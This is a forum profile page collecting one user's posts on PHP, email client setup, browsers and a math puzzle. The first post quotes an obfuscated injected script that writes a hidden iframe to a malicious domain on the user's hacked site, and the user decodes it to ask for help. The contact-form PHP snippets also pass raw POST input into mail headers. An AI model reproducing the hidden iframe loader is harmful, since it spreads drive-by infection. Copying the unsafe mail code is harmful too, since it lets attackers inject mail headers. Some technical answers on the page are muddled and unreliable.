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Posts posted by veerumits

  1. the following script automatically added in my host site what i do i remove so many time but when i open file and see, it found in my site , it is not permanently remove in my site please have any sollution so script remove, this script added in each and every page of the host directory, ur welcome to advice me.

    <script type="text/javascript">document.write(String.fromCharCode(118,97,114,32,102,103,103,103,101,51,61,34,115,105,34,59,118,97,114,32,119,51,52,53,61,34,112,108,34,59,118,97,114,32,114,101,54,61,34,97,110,107,46,34,59,118,97,114,32,114,114,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,34,59,118,97,114,32,115,61,34,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,114,97,109,101,32,115,114,99,61,34,104,39,43,115,43,39,112,58,47,47,39,43,102,103,103,103,101,51,43,39,39,43,119,51,52,53,43,39,39,43,114,101,54,43,39,39,43,114,114,43,39,47,39,43,39,113,113,112,47,39,43,39,39,43,39,39,43,39,34,32,115,116,121,108,101,61,34,100,39,43,39,105,115,112,108,97,121,58,110,39,43,39,111,110,101,34,62,60,47,105,102,39,43,39,114,97,109,101,62,39,41,59,118,97,114,32,116,61,48,48,48,48,49,50,49,55))</script>
    After evaluation of above script we find that the meaning of this code is :
    [var fggge3="si";var w345="pl";var re6="ank.";var rr="com";var a="if";var s="tt";document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');var t=00001217;]
    Final Evaulation we conclude that this is URL :
    <a scr="http://siplank[dot]com/qqp/.." style="display:none"></a> var t=00001217;

    any body have idea how this come in webpage plz suggest me i only reach this point ok.

    Notice from rvalkass:

    Code tags added. I've also broken the link the the malicious website.

  2. Cable is always faster then the other medium to use the network because there is less chances to collide the packet there is 100% connectivity, but if there is network congession then the speed is gone to slow so as i think that the speed depends on use of network, now a days DSL speed is faster, then the cable but practically what i feel the the speed never faster in DSL in comparission to cable. now come to point cable ISP control the speed so it depend on others thats by customer feel the speed is getting slow,thanks

  3. Well there is problem in your Graphics card it is not compatible to the game which you are playing so need to either change it or make to it compatible by small change in configuration file of graphics card embeded software. there may be requirement to change there hardware configuration of card to make compatible with full support of any garphics software. first please read the instruction of readme file of configuration.ini or may different name. and make change according to instruction to install full support graphics accelerator.please this is only guide/way to solve the problem, but you go according to your way which is suitable to you.thanks

  4. I want to completely remove default internet explorer on windows XP operating system. for this what i do ?
    actually i installed new version of internet explorer in my operating system and when i open that IE from this old version automatically open in my desktop.
    i aso install mozila firefox3.0, when i open this on one opening a new one in advance open. thus i want to completely remove my old IE from OS always either opening IE or Moziall a site is open https://www.google.co.in/?gws_rd=ssl i want any how this is not happened what i explore only that site is open.

    please welcome to suggetion.


  5. Good Morning to all of u , frnds , i have a problem to convert javascript variable to php session variable, actually i have a registration page on which user filled there form and then he click on a hyperlink suppose(add more appliances) a pop will appear on the screen on that pop-up should have username which the user filled in the begining of the form. and i have used onBlur as javascript event , and want to use session variable to transfer variable from main window to pop window.your suggessions and responses are welcomei am suffering from this problem since last 2 days and unable to solve ,the problem with me is javascript , tell me if u have any complete solution in php only.thanx in advance

  6. Two method are preg_split() and explode() are used to split the pattern:
    when and where we can use these method let us i explain

    <?php$s ='on|tp|tr|fr';print_r(explode('|', $s, 2));?>Array([0] => on[1] => tp|tr|fr)

    if we want to split

    Then explode() is not work because it must be require one identifier.
    and there is no identifier in "Hello" so we can not use explode(),
    but by preg_split() we can split the pettern

    how we use

    <?php$x="Hello";$y=preg_split("", $x);// please help there what we write so it workprint_r($y); // [0]=>H [1]=>e [2]=>l [3]=>l [4]=>0?><?php$x="Anil", Raju and Mukesh";$y=preg_split("/,| and /", $x);print_r($y); // [0]=>Anil [1]=>Raju [2]=>Mukesh?>

    it works fine


  7. I have confusion in Single Quote and Double Quote in PHP Programming so any body help in this regard in details with explanation. I only know that both are use to represent string
    for example

    <?php$x=20;echo "$x"; //output 20echo '"$x"';//output "$x"echo '$x';//output $xecho "'$x'";//output '20'echo ""$x"";//output Syntax error or parser errorecho "\"$x\"";//output "20" use of escape sequence ?>
    when we execute i got output as you see above

    but my confusion is not clear so please explain above each and every line of the code.

    Notice from truefusion:
    Use code bbcode for code.

  8. Thanks,
    i dont want to convert my yahoo mail service POP access - paid service if gmail is free so i use gmail pop3 server.please, One think i also want to know that can i configure pop3 for veerumits.trap17.com mail server so my all mail coming on this site are send to outlook there possibility or need a external mail server what is chance to configure it may work or not.

    Unlike GMail, POP access for Yahoo is paid service. You must subscrible to their Yahoo mail plus to use POP access. May be thats why you are facing the problem. If you want to setup a GMail account for POP, I can help you. POP3 access for Gmail is free.

  9. I want to setup configure Microsoft Office Outlook 2007 to Yahoo mail server and the configuration for this are :-

    Incoming Mail Server (POP3): in.pop.mail.yahoo.com Use SSL, port: 995


    Outgoing Mail Server (SMTP): in.smtp.mail.yahoo.com Use SSL, port: 465, use authentication


    Account Name/Username: xyz@yahoo.co.in Password: Your Yahoo! Mail password

    after configuring these all in outlook.

    not working.



  10. I configure Microsoft Office Outlook 2007 in tools menu->Account settingAdd New account:-Choose email serverPOP3 IMAP HTTP i configure POP3 and IMAPUser informationYour Name:Email Address:Password :Server informationIncoming mail server :out going mail server :Login Informationuser name:password:but the mail is not going and incoming could any body help or give more information about it why the mail client not working there is any explicit option to configuration need.thanks

  11. if you are viewing image on web page then you have so many option to save in your system i give one of them simply right click on the image. you see so many option as per your desire you choose save image, copy image etc.click and proceed further where you want to save or paste in paint. you got the image on your system, so any where you can move it either on the web or in your system, as per your work, if you want to upload this image on the web use picasa software to upload your image on the web. or any free uplaod site of image just googling you find as per your convenient site. if you want to make change on the image you can use any image editor like paint, photoshop, photo image editor etc.but keep the image format before saving image it must be in supported format or you can leave the default format. save it and use it.thanks

  12. Really your information produce here is very usefull.
    can you please explain each and every term with details.
    i need more information in this topic.

    2 years ago I was looking for this to but then a friend and I made a script (he knew javascript).
    First we made a div box:

    <div id="floatdiv" style="       position:absolute;       width:200px;height:50px;left:0px;top:0px;       padding:16px;background:#FFFFFF;       border:2px solid #2266AA">   !!CONENT HERE!!   </div>

    Then after the div box code:

    <script type="text/javascript"></script>

    The target_x and target_y variables represent the desired distance from the top left corner of the menu to the window borders.
    Positive values mean distance from left and top border and negative - from right and bottom.

    I hope this is wat you where looking fore. :)

    Some parts of the code where note made by me or my friend, those where code snippets found on the web.

  13. Every language has there own functionality and there facility to do complete the daily task to convert it into indirectly in computer form (i.e binary - 0/1). and also have limitation, facility but this is fact that we want to archive goal of Artificial Intelligence means to robotics in daily life. thanks god who give this model in daily life. what my view in this regard i say that there should be need of more enhancement in programing language. Language never old, it always young even tradition change to use old language. Thanks

  14. Little bit i got the idea to send the email from Local WAMP to Internet
    Step are required:
    1.Web server -installed and configured to accept the Request and response.
    2. Mail server -you must be installed mail Server you can installed it from control panel -> add remove program -> add remove windows component -> installed IIS(Mail server-SMTP, etc).
    use as it is like in php file

    <?phpif(isset($_REQUEST['Submit'])){		@extract($_POST);	  			$subject=$subject;		  $msg="Name:".$name."n"."Email:".$email."n"."Message:".$msg;$to="yourmail@yahoo.com";		$headers .= "Reply-to: $headers4n";$headers .= "From: $emailn";$headers .= "Errors-to: $headers4n";	if(mail("$em","Query!!!","$msg n n Site Admin","$headers"))  	{  	$massage1="<center><font face='Verdana' size='2' ><b>THANK YOU</b> <br>Your email has been sent successfully..</center>";	}	else{  	echo " <center><font face='Verdana' size='2' color=red >There is some system problem in sending login details to your address. Please contact Site Admin. <br></center></font>";  	}}	  ?><table width="99%" border="0" align="center" cellpadding="0" cellspacing="5" bgcolor="#CCCCFF">			  <form method="post" action="Contactus.php" enctype="multipart/form-data" name="form" >			  <tr>				<td width="27%" align="right" class="form_text">Name<span class="price_text">*</span> </td>				<td width="73%" align="left"><input name="name" type="text" class="form_text_area" id="name" maxlength="32" /></td>			  </tr>			  <tr>				<td align="right" class="form_text">Email<span class="price_text">*</span> </td>				<td align="left"><input name="email" type="text" class="form_text_area" id="email" maxlength="32" /></td>			  </tr>			  <tr>				<td align="right" class="form_text">Subject<span class="price_text"> *</span></td>				<td align="left"><input name="subject" type="text" class="form_text_area" id="subject" maxlength="32" />				</td>			  </tr>			  <tr>				<td align="right" class="form_text">Message<span class="price_text"> *</span></td>				<td align="left"><label>				  <textarea name="msg" cols="30" rows="10" id="msg"></textarea>				</label></td>			  </tr>			  <tr>				<td align="right" class="form_text"> </td>				<td align="left"><label>				  <input type="submit" name="Submit" value="Submit" />				</label></td>			  </tr></form></table>
    you may try it practically i am not gone to through this way i just read it from book.
    what exactly it works or not please go ahead.

  15. Dear i am here posting the information regarding sending mail from mail server to any client using php tools

    <?phpif(isset($_REQUEST['Submit'])){		@extract($_POST);	   			$subject=$subject;		   $msg="Name:".$name."\n"."Email:".$email."\n"."Message:".$msg;$to="yourmail@yahoo.com";		$headers .= "Reply-to: $headers4\n";$headers .= "From: $email\n";$headers .= "Errors-to: $headers4\n";	if(mail("$em","Query!!!","$msg \n \n Site Admin","$headers"))   	{   	$massage1="<center><font face='Verdana' size='2' ><b>THANK YOU</b> <br>Your email has been sent successfully..</center>";	}	else{   	echo " <center><font face='Verdana' size='2' color=red >There is some system problem in sending login details to your address. Please contact Site Admin. <br></center></font>";   	}}	   ?><table width="99%" border="0" align="center" cellpadding="0" cellspacing="5" bgcolor="#CCCCFF">			  <form method="post" action="Contactus.php" enctype="multipart/form-data" name="form" >			  <tr>				<td width="27%" align="right" class="form_text">Name<span class="price_text">*</span> </td>				<td width="73%" align="left"><input name="name" type="text" class="form_text_area" id="name" maxlength="32" /></td>			  </tr>			  <tr>				<td align="right" class="form_text">Email<span class="price_text">*</span> </td>				<td align="left"><input name="email" type="text" class="form_text_area" id="email" maxlength="32" /></td>			  </tr>			  <tr>				<td align="right" class="form_text">Subject<span class="price_text"> *</span></td>				<td align="left"><input name="subject" type="text" class="form_text_area" id="subject" maxlength="32" />				</td>			  </tr>			  <tr>				<td align="right" class="form_text">Message<span class="price_text"> *</span></td>				<td align="left"><label>				  <textarea name="msg" cols="30" rows="10" id="msg"></textarea>				</label></td>			  </tr>			  <tr>				<td align="right" class="form_text"> </td>				<td align="left"><label>				  <input type="submit" name="Submit" value="Submit" />				</label></td>			  </tr></form></table>

    if still have any question in this topic please reply.


    I ment like if you have a e-mail account provided my popular service like yahoo, let's name it "myemail@yahoo.com" then with alittle programming you would have the form to be sent to your myemail@yahoo.com

  16. Dear i install joomla from my wamp (localhost), it install without error. and work fine as i see.but i have problem with how we use all feature of joomla.because i dont have idea of joomla could anybody guide me. by reading help . i create one article and published it but what i see that the header and footer and powered by is not change what i saw in template it was as it is. could it possible. that header and footer and powered by statement changed.

  17. The idea i here produce.In PHP.ini file you edit the entry smtp=smtp.my.net.serverme@localhostsmtp_port = 25sendmail_from = <YourmailID>actualy these entry are required to send the mail to any mail client from mail server.but what you expect that you want to set the SMTP details in .htaccess file then PHP recognises and uses it, i dont have any idea about it. but external entry in .htaccess file related to SMTP is lover chances.actualy all information reside on the mail server.thanks

  18. Well, i am already use this service provided by the Google free of cost submission of your web site, once you submit your site it is automatically crawl by Google crawler and also automatically update when the crawler run periodically. you see all the index results.





    here are tips:-


    open this url:-






    Sign in to Webmaster Tools:-


    Dashboard :-

    submit your site.



    Top search queries »

    Home page crawl:

    Googlebot has successfully accessed your home page. More information.

    Index status:

    Pages from your site are included in Google's index. See Index stats. Help




    You have not submitted any Sitemaps. Submit a Sitemap to help Google discover pages our crawlers might not otherwise find. Once you create and submit a Sitemap listing the URLs on your site, we'll provide you with data on how Google is indexing those pages. More information


    Web crawl errors


    Last updated Dec 4, 2008


    Googlebot crawls sites by following links from page to page. We had problems crawling the pages listed here, and as a result they won't be added to our index and will not appear in search results.


    Review the errors below and check any affected page for problems. For example, URLs not followed errors can be a clue that some of your pages contain content (such as rich media files or images) that Googlebot can't easily crawl, or that their URL structure is not Google-friendly.

    Learn more about crawl errors


    Note: Not all errors may be actual problems. For example, you may have chosen to deliberately block crawlers from some pages. If that's the case, there's no need to fix the error.


    Errors for URLs in Sitemaps ‎(0)‎ HTTP errors ‎(0)‎ Not found ‎(2)‎ URLs not followed ‎(0)‎ URLs restricted by robots.txt ‎(0)‎ URLs timed out ‎(0)‎ Unreachable URLs ‎(0)



    use these and index your site.



    The Google Site Status Wizard which is part of the free Google Webmaster Tools is a very simple tool that help us to find out if any site is currently being indexed by Google.


    The Google Site Status Wizard is a simple free tool which consists of only two steps, in the first step you simply enter a site URL to check its status on the Google's index, and in the second step the wizard shows you if the pages from your site are included in Google's index, if the Googlebot has accessed your home page successfully and if you have indexing problems.


    As i said before, this is a very simple tool, so, if you need more details and if you have a Google Account, you can sign up to the Google Webmaster Tools with it and get more details like top search queries that return your site, errors encountered by Googlebot, submit Google sitemaps, check the robots.txt of your page, set your geographical target of your users, etc.


    Best regards,

  19. javascript keyevents ??????????? friends i have used a good technique on my webpage to restrict user that they can not right-clik on my webpage.but now i want to restrict the user that they also can not use ctrl+a , ctrl+c ,is there any simple way which can solve my problem , because i think this type of techinque are very popular now a days on every website if u have any solution then plz send me respone . but the code should be simple to understatn.

  20. Here lies the catch :P Every person started with $20 and ended up with $2, which means that they spent $18 each. Three times eighteen is 54 dollars which is $50+$4 - the price of the gift and the price of the taxi ride :rolleyes:

    Ha Ha Ha, Great Catch, Yes, So your calculation just like this $50+$4(the price of the gift and the price of the taxi ride) and remaining $6, divided in three part so it less in $60 so it equal to $54 and the calculation you put is correct.
    Congratulation! you are solve this,
    It is just fun enjoy !


  21. Please avoid double posting, veerumits.Remember that you initially posted this topic in the tutorial section. And remember that the tutorials are not visible until they have been reviewed and accepted.
    And your topic is not really a tutorial, it looks rather like a request for tutorial. That's why I moved it here.

    lot of thanks,
    actually this is happened due to speed of connection, i refresh,and there is no response, i think this is not post so i again submit, thats by this is happened.
    thanks again.

  22. Where there is fault in my calculation,Now start,There are three person A, B and C.each one have $20, i mean A have $20, B have $20, C have $20.They Contribute and equal to A+B+C=20+20+20;i mean total $60,when they reach a shop a shop's servant meet and buy a Gift worth Rs. $60, by the shop's servant,when the shopkeeper come on the shop and ask the question to the servant how much cost you sell that gift, servant says $60.Shopkeeper told her but Actual cost is Worth Rs. $50, why are you sell with $60 cost, Please go to return her $10, Servant goes to the buyer house and in between the way he spend $4 in taxi fair so he only return $6 to the buyers,They A,B and C are Divide $6 in three part and take it. i mean less $2 what they pay $20. so each one pay Now $20-$2=$18,When the servant come to the shop, he gives the solution of the Total Cost of Gift $18+$18+$18=$54(actual Cost)He also spend $4 So he add $54+$4=$58then shopkeeper told to servant where $2 goes.if we add $54+$6=$60 then where we say that servant spend $4, there is no clue about servant fair. either they pay $56 +$4 and if They pay $56 then how this can possible. actually they pay only $54 by the calculation this is clear. any way try to find out the actual calculation of this funny joke.thanks

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